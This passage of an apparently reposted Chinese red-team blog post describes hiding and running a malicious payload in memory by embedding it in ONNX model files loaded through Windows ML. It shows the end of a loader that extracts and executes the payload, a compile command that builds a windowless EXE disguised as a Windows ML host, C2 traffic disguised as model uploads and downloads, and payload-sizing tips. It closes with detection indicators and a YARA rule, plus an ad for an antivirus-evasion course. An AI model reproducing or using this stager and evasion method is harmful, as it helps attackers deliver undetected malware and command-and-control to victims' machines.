&nbsp; &nbsp; printf("[+] 已获取模型:%zu 字节\n", model_bytes.size());

&nbsp; &nbsp; printf("[*] 通过 WinML 加载模型(行为伪装)...\n");
&nbsp; &nbsp; load_model_winml(model_bytes);

&nbsp; &nbsp; printf("[*] 提取并执行载荷...\n");
&nbsp; &nbsp; extract_and_execute(model_bytes);
&nbsp; &nbsp; return&nbsp;0;
}

编译命令:

cl.exe /nologo /EHsc /std:c++17 /O2 /MT ^
&nbsp; &nbsp; /D&nbsp;"WIN32"&nbsp;/D&nbsp;"NDEBUG"&nbsp;/D&nbsp;"_UNICODE"&nbsp;/D&nbsp;"UNICODE"&nbsp;^
&nbsp; &nbsp; winml_loader.cpp ^
&nbsp; &nbsp; /Fe:WindowsMLHost.exe ^
&nbsp; &nbsp; /link /SUBSYSTEM:WINDOWS /ENTRY:mainCRTStartup ^
&nbsp; &nbsp; windowsapp.lib winhttp.lib ^
&nbsp; &nbsp; /MACHINE:X64

/SUBSYSTEM:WINDOWS + /ENTRY:mainCRTStartup 会生成一个没有控制台窗口的 GUI 应用,同时保持标准 main() 入口。


网络流量分析

当加载器获取 ONNX 模型时,网络流量如下:

GET&nbsp;/v1/models/vision_classifier_v2.onnx&nbsp;HTTP/1.1
Host:&nbsp;models.example.com
User-Agent:&nbsp;Mozilla/5.0 (Windows NT 10.0; Win64; x64) Edge/120.0
Accept:&nbsp;application/octet-stream, application/x-protobuf

HTTP/1.1&nbsp;200&nbsp;OK
Content-Type:&nbsp;application/octet-stream
Content-Length:&nbsp;51283

<二进制&nbsp;protobuf&nbsp;—&nbsp;完全合法的&nbsp;ONNX&nbsp;模型>

对于网络分析师或 NIDS 来说,这与任何从云端拉取模型进行本地推理的应用程序流量完全一致。URL 路径、Content-Type、User-Agent、二进制载荷全部符合预期模式。

甚至可以将后续 C2 通信也包装成 ONNX 模型的上传/下载:

POST&nbsp;/v1/telemetry/model_metrics&nbsp;HTTP/1.1
Content-Type:&nbsp;application/octet-stream

<包含&nbsp;C2&nbsp;结果的&nbsp;ONNX&nbsp;模型(放在&nbsp;metadata_props&nbsp;中)>

服务端下发的任务命令也作为 ONNX 模型返回,结果再作为 ONNX 模型上传。整个会话就是一条普通的 ML 模型文件流。


检测与防御

对于防守方,可以关注以下指标:

静态分析

  • • 导入表组合windowsapp.dll + winhttp.dll 同时出现,在正常 ML 应用中较少见(大多数使用更上层的 HTTP 库)。
  • • 无实际推理:如果一个二进制文件加载了 WinML 模型,却从未创建 LearningModelSession 或调用 Evaluate(),那就是在用 WinML 做掩护。
  • • 元数据熵值:合法 ONNX 模型的元数据通常为低熵(作者名、描述等)。而 base64 编码的载荷会产生高熵——可以检测 metadata_props 中熵值 > 5.5 比特/字节的条目。

运行时/行为

  • • 有加载无推理:ETW 事件 Microsoft-Windows-AI-MachineLearning 显示模型被加载,但没有后续的 SessionCreated 或 EvaluationStart 事件。
  • • 模型加载后出现 RWX/RX 内存:在 WinML 模型加载后短时间内调用 VirtualAlloc + VirtualProtect(PAGE_EXECUTE_READ) 是一个强烈信号。
  • • 模型来源:模型来自 InMemoryRandomAccessStream 而不是文件路径,说明模型是从网络获取且从未落盘。

网络

  • • ONNX 文件结构检测:深度包检测可以解析 protobuf 头部。如果一个模型的计算图几乎为空(只有一个 Identity 节点),但元数据或权重张量却很大,则高度可疑。
  • • 高频下载:合法 ML 应用很少频繁下载模型(仅在安装或更新时)。每隔几秒/几分钟就下载一个 ONNX 文件,说明可能是 C2 心跳。

YARA 规则示例

rule ONNX_Payload_Stager {
&nbsp; &nbsp; meta:
&nbsp; &nbsp; &nbsp; &nbsp; description = "ONNX 模型中存在可疑元数据(潜在载荷投递)"
&nbsp; &nbsp; strings:
&nbsp; &nbsp; &nbsp; &nbsp; $onnx_ir = { 08 (07|08|09) } &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;// ir_version 字段
&nbsp; &nbsp; &nbsp; &nbsp; $identity = "Identity" ascii
&nbsp; &nbsp; &nbsp; &nbsp; $chunk_key = /weight_hash_\d+/ ascii
&nbsp; &nbsp; &nbsp; &nbsp; $graph_name = "model" ascii
&nbsp; &nbsp; &nbsp; &nbsp; $input_name = "input" ascii
&nbsp; &nbsp; &nbsp; &nbsp; $output_name = "output" ascii
&nbsp; &nbsp; condition:
&nbsp; &nbsp; &nbsp; &nbsp; $onnx_ir at 0 and $identity and $chunk_key and
&nbsp; &nbsp; &nbsp; &nbsp; $graph_name and $input_name and $output_name and
&nbsp; &nbsp; &nbsp; &nbsp; filesize < 5MB
}

操作注意事项

  • • 模型有效性:构造的模型必须通过 ONNX 验证,否则 WinML 会拒绝加载。务必用 onnx.checker.check_model() 测试。

  • • 大小限制

  • • 元数据方法:每个 StringStringEntryProto 值约可容纳 16MB(protobuf 长度限制),base64 开销约 33%。实际每个分块可承载约 12MB 原始载荷,分块数量不限。

  • • 权重张量方法:TensorProto.raw_data 没有实际大小限制。生产环境中上百 MB 的权重张量很常见。

  • • Windows 版本要求:WinML 需要 Windows 10 1809(build 17763)或更高版本。过低版本会激活失败。

  • • COM 初始化:WinML 需要 COM,如果你的加载器运行在 COM 已初始化但标志不兼容的环境中,请使用 winrt::init_apartment() 适配。


总结

Windows 机器学习子系统为红队提供了一个强大且被忽视的基元。通过将载荷嵌入合法的 ONNX 模型文件,攻击者可以获得:

  • • 合法的二进制签名:导入表和 API 调用与真实 ML 应用完全一致
  • • 网络隐身:ONNX protobuf 流量与正常的模型服务基础设施无法区分
  • • 内存操作:WinML 从流中加载模型,磁盘零痕迹
  • • 行为伪装:ETW 遥测显示的是正常的 ML 推理活动

该技术适用于所有现代 Windows 系统,无需额外运行时依赖。随着机器学习推理在终端上变得无处不在,这一攻击面只会继续扩大。

检测方法确实存在,但需要防守方深入分析行为,而不是停留在表面。各类机构应当审计 WinML 的使用模式,监控“有加载无推理”的模型,并检查 ONNX 元数据中的异常熵值。

免责声明:本文所有代码仅用于授权的安全研究和红队演练。请在获得明确授权的环境中测试。


觉得本文有用?欢迎点赞、在看、转发,让更多人了解这种新型攻击手法。

免杀培训课程:

【五一优惠】|  2026老鑫安全0基础培训


免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:老鑫安全 老鑫安全 老鑫安全《免杀新姿势:利用 Windows 机器学习(WinML)在内存中隐蔽执行恶意载荷》

评论:0   参与:  0